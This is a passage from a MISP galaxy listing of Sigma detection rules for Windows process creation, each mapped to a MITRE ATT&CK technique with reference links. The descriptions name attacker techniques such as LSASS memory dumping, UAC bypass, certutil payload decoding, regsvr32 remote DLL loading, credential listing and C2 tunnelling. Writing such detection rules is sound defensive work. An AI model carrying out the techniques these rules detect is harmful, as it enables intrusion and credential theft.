https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml

Start Windows Service Via Net.EXE

Detects the usage of the "net.exe" command to start a service using the "start" flag

The tag is: misp-galaxy:sigma-rules="Start Windows Service Via Net.EXE"

Start Windows Service Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10661. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_start_service.yml

Enumerate All Information With Whoami.EXE

Detects the execution of "whoami.exe" with the "/all" flag

The tag is: misp-galaxy:sigma-rules="Enumerate All Information With Whoami.EXE"

Enumerate All Information With Whoami.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10662. Table References

Links

https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/

https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/

https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_all_execution.yml

Psexec Execution

Detects PsExec command lines that include the user agreement acceptance flag

The tag is: misp-galaxy:sigma-rules="Psexec Execution"

Psexec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Services - T1569" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 10664. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_execution.yml

Suspicious RASdial Activity

Detects suspicious processes related to rasdial.exe

The tag is: misp-galaxy:sigma-rules="Suspicious RASdial Activity"

Suspicious RASdial Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10665. Table References

Links

https://twitter.com/subTee/status/891298217907830785

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rasdial_execution.yml

Suspicious New Service Creation

Detects creation of a new service via the "sc" command or the PowerShell "New-Service" cmdlet with suspicious binary paths

The tag is: misp-galaxy:sigma-rules="Suspicious New Service Creation"

Suspicious New Service Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10666. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml

Exchange PowerShell Snap-Ins Usage

Detects adding and using Exchange PowerShell snap-ins to export mailbox data, as seen used by HAFNIUM and APT27.

The tag is: misp-galaxy:sigma-rules="Exchange PowerShell Snap-Ins Usage"

Exchange PowerShell Snap-Ins Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

Table 10667. Table References

Links

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

https://www.intrinsec.com/apt27-analysis/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml

Potential Persistence Attempt Via Existing Service Tampering

Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Attempt Via Existing Service Tampering"

Potential Persistence Attempt Via Existing Service Tampering has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10668. Table References

Links

https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml

UAC Bypass Using DismHost

Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using DismHost"

UAC Bypass Using DismHost has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10669. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml

Compressed File Creation Via Tar.EXE

Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.

The tag is: misp-galaxy:sigma-rules="Compressed File Creation Via Tar.EXE"

Compressed File Creation Via Tar.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10670. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage

https://lolbas-project.github.io/lolbas/Binaries/Tar/

https://unit42.paloaltonetworks.com/chromeloader-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tar_compression.yml

Suspicious File Download From IP Via Wget.EXE - Paths

Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe

The tag is: misp-galaxy:sigma-rules="Suspicious File Download From IP Via Wget.EXE - Paths"

Table 10671. Table References

Links

https://www.gnu.org/software/wget/manual/wget.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_susp_locations.yml

Suspicious Plink Port Forwarding

Detects suspicious Plink tunnel port forwarding to a local port

The tag is: misp-galaxy:sigma-rules="Suspicious Plink Port Forwarding"

Suspicious Plink Port Forwarding has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 10672. Table References

Links

https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d

https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml

Write Protect For Storage Disabled

Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by the cypherpunk group.

The tag is: misp-galaxy:sigma-rules="Write Protect For Storage Disabled"

Write Protect For Storage Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 10673. Table References

Links

https://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml

Renamed Visual Studio Code Tunnel Execution

Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel

The tag is: misp-galaxy:sigma-rules="Renamed Visual Studio Code Tunnel Execution"

Renamed Visual Studio Code Tunnel Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10674. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://code.visualstudio.com/docs/remote/tunnels

https://badoption.eu/blog/2023/01/31/code_c2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml

Verclsid.exe Runs COM Object

Detects when verclsid.exe is used to run a COM object via its GUID

The tag is: misp-galaxy:sigma-rules="Verclsid.exe Runs COM Object"

Verclsid.exe Runs COM Object has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10675. Table References

Links

https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5

https://lolbas-project.github.io/lolbas/Binaries/Verclsid/

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml

Potentially Suspicious Regsvr32 HTTP IP Pattern

Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Regsvr32 HTTP IP Pattern"

Potentially Suspicious Regsvr32 HTTP IP Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10676. Table References

Links

https://twitter.com/tccontre18/status/1480950986650832903

https://twitter.com/mrd0x/status/1461041276514623491

https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml

Potential Product Class Reconnaissance Via Wmic.EXE

Detects the execution of WMIC in order to get a list of firewall and antivirus products

The tag is: misp-galaxy:sigma-rules="Potential Product Class Reconnaissance Via Wmic.EXE"

Potential Product Class Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10677. Table References

Links

https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1

https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml

Potential Arbitrary File Download Using Office Application

Detects potential arbitrary file download using a Microsoft Office application

The tag is: misp-galaxy:sigma-rules="Potential Arbitrary File Download Using Office Application"

Potential Arbitrary File Download Using Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10678. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/

https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml

Suspicious DumpMinitool Execution

Detects suspicious ways to use the "DumpMinitool.exe" binary

The tag is: misp-galaxy:sigma-rules="Suspicious DumpMinitool Execution"

Suspicious DumpMinitool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10679. Table References

Links

https://twitter.com/mrd0x/status/1511489821247684615

https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/

https://twitter.com/mrd0x/status/1511415432888131586

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml

Execution of Powershell Script in Public Folder

This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder

The tag is: misp-galaxy:sigma-rules="Execution of Powershell Script in Public Folder"

Execution of Powershell Script in Public Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10680. Table References

Links

https://www.mandiant.com/resources/evolution-of-fin7

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml

Use Short Name Path in Image

Detects use of Windows 8.3 short names, which could be used as a method to evade Image-based detection

The tag is: misp-galaxy:sigma-rules="Use Short Name Path in Image"

Use Short Name Path in Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10681. Table References

Links

https://twitter.com/frack113/status/1555830623633375232

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN

https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml

Fsutil Suspicious Invocation

Detects suspicious parameters of fsutil (deleting the USN journal, configuring it with a small size, etc.). Might be used by ransomware during an attack (seen with NotPetya and others).

The tag is: misp-galaxy:sigma-rules="Fsutil Suspicious Invocation"

Fsutil Suspicious Invocation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 10682. Table References

Links

https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md

https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt

https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_usage.yml

Insensitive Subfolder Search Via Findstr.EXE

Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.

The tag is: misp-galaxy:sigma-rules="Insensitive Subfolder Search Via Findstr.EXE"

Insensitive Subfolder Search Via Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10683. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Findstr/

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_subfolder_search.yml

Execute Pcwrun.EXE To Leverage Follina

Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability

The tag is: misp-galaxy:sigma-rules="Execute Pcwrun.EXE To Leverage Follina"

Execute Pcwrun.EXE To Leverage Follina has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10684. Table References

Links

https://twitter.com/nas_bench/status/1535663791362519040

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml

Potential Reconnaissance Activity Via GatherNetworkInfo.VBS

Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine

The tag is: misp-galaxy:sigma-rules="Potential Reconnaissance Activity Via GatherNetworkInfo.VBS"

Potential Reconnaissance Activity Via GatherNetworkInfo.VBS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 10685. Table References

Links

https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gather_network_info.yml

Potential PowerShell Execution Policy Tampering - ProcCreation

Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Execution Policy Tampering - ProcCreation"

Table 10686. Table References

Links

https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml

Renamed Sysinternals Sdelete Execution

Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn’t do (the renaming)

The tag is: misp-galaxy:sigma-rules="Renamed Sysinternals Sdelete Execution"

Renamed Sysinternals Sdelete Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 10687. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md

https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml

Shell Process Spawned by Java.EXE

Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)

The tag is: misp-galaxy:sigma-rules="Shell Process Spawned by Java.EXE"

Table 10688. Table References

Links

https://www.lunasec.io/docs/blog/log4j-zero-day/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_susp_child_process_2.yml

Permission Misconfiguration Reconnaissance Via Findstr.EXE

Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured file or folder permissions

The tag is: misp-galaxy:sigma-rules="Permission Misconfiguration Reconnaissance Via Findstr.EXE"

Permission Misconfiguration Reconnaissance Via Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

Table 10689. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml

Cloudflared Tunnel Execution

Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.

The tag is: misp-galaxy:sigma-rules="Cloudflared Tunnel Execution"

Cloudflared Tunnel Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10690. Table References

Links

https://github.com/cloudflare/cloudflared

https://blog.reconinfosec.com/emergence-of-akira-ransomware-group

https://developers.cloudflare.com/cloudflare-one/connections/connect-apps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml

File Decoded From Base64/Hex Via Certutil.EXE

Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution

The tag is: misp-galaxy:sigma-rules="File Decoded From Base64/Hex Via Certutil.EXE"

File Decoded From Base64/Hex Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10691. Table References

Links

https://twitter.com/JohnLaTwC/status/835149808817991680

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

https://lolbas-project.github.io/lolbas/Binaries/Certutil/

https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/

https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_decode.yml

Suspicious Child Process Created as System

Detects child processes spawned with SYSTEM privileges by parents running under the LOCAL SERVICE or NETWORK SERVICE accounts

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Created as System"

Suspicious Child Process Created as System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

Table 10692. Table References

Links

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

https://twitter.com/Cyb3rWard0g/status/1453123054243024897

https://github.com/antonioCoco/RogueWinRM

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml

AADInternals PowerShell Cmdlets Execution - ProccessCreation

Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.

The tag is: misp-galaxy:sigma-rules="AADInternals PowerShell Cmdlets Execution - ProccessCreation"

Table 10693. Table References

Links

https://o365blog.com/aadinternals/

https://github.com/Gerenios/AADInternals

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml

Suspicious TSCON Start as SYSTEM

Detects a tscon.exe start as LOCAL SYSTEM

The tag is: misp-galaxy:sigma-rules="Suspicious TSCON Start as SYSTEM"

Suspicious TSCON Start as SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10694. Table References

Links

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_localsystem.yml

Process Memory Dump Via Dotnet-Dump

Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.

The tag is: misp-galaxy:sigma-rules="Process Memory Dump Via Dotnet-Dump"

Process Memory Dump Via Dotnet-Dump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10695. Table References

Links

https://twitter.com/bohops/status/1635288066909966338

https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dotnet_dump.yml

Potential Discovery Activity Via Dnscmd.EXE

Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.

The tag is: misp-galaxy:sigma-rules="Potential Discovery Activity Via Dnscmd.EXE"

Potential Discovery Activity Via Dnscmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10696. Table References

Links

https://docs.microsoft.com/en-us/azure/dns/dns-zones-records

https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml

Suspicious Dump64.exe Execution

Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder

The tag is: misp-galaxy:sigma-rules="Suspicious Dump64.exe Execution"

Suspicious Dump64.exe Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10697. Table References

Links

https://twitter.com/mrd0x/status/1460597833917251595

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml

Suspicious Cmdl32 Execution

Detects the LOLBAS binary Cmdl32 being used to download a payload in order to evade antivirus.

The tag is: misp-galaxy:sigma-rules="Suspicious Cmdl32 Execution"

Suspicious Cmdl32 Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10698. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/

https://twitter.com/SwiftOnSecurity/status/1455897435063074824

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml

PUA - CsExec Execution

Detects the use of the lesser-known remote execution tool named CsExec, a PsExec alternative.

The tag is: misp-galaxy:sigma-rules="PUA - CsExec Execution"

PUA - CsExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10699. Table References

Links

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://github.com/malcomvetter/CSExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_csexec.yml

Windows Credential Manager Access via VaultCmd

List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe

The tag is: misp-galaxy:sigma-rules="Windows Credential Manager Access via VaultCmd"

Windows Credential Manager Access via VaultCmd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 10700. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vaultcmd_list_creds.yml

Suspicious Child Process Of SQL Server

Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Of SQL Server"

Suspicious Child Process Of SQL Server has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 10701. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_susp_child_process.yml

Remote Access Tool - ScreenConnect Server Web Shell Execution

Detects potential web shell execution from the ScreenConnect server process.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Server Web Shell Execution"

Remote Access Tool - ScreenConnect Server Web Shell Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 10702. Table References

Links

https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8

https://blackpointcyber.com/resources/blog/breaking-through-the-screen/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_webshell.yml

WSL Child Process Anomaly

Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL

The tag is: misp-galaxy:sigma-rules="WSL Child Process Anomaly"

WSL Child Process Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10703. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/

https://twitter.com/nas_bench/status/1535431474429808642

